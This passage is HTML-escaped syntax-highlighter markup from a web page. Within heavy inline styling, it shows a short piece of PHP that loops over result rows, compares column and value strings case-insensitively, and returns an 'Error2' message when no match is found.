!important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-88&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$whereColumn&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-89&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-90&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-91&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-92&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-93&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error2&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-94&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-95&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$countRow&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-96&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$whereValue&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: 